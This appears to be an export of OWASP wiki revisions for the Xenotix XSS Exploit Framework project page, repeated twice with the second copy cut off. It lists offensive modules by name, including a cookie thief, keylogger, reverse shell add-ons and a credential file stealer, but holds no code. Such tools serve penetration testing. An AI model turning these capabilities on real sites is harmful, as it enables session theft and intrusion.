'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:ToolsWatch.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]&lt;br /&gt;
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
**DOM XSS Analyzer&lt;br /&gt;
**Local DOM XSS Analyzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]&lt;br /&gt;
MD5: 17c703f90dbb4f09b112284232bbb69f&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
==V6.1 Changes==&lt;br /&gt;
* Bug Fixes&lt;br /&gt;
* Updated QuickPHP Server&lt;br /&gt;
* Local DOM XSS Analyzer&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]	&lt;br /&gt;
&lt;br /&gt;
= Goodies =		&lt;br /&gt;
== Xenotix Hoodies ==&lt;br /&gt;
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:ToolsWatch.png&amp;diff=188142</id>
		<title>File:ToolsWatch.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:ToolsWatch.png&amp;diff=188142"/>
				<updated>2015-01-15T04:57:54Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: Ajin Abraham uploaded a new version of &amp;amp;quot;File:ToolsWatch.png&amp;amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=187783</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=187783"/>
				<updated>2015-01-10T05:04:21Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: added goodies&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
**DOM XSS Analyzer&lt;br /&gt;
**Local DOM XSS Analyzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
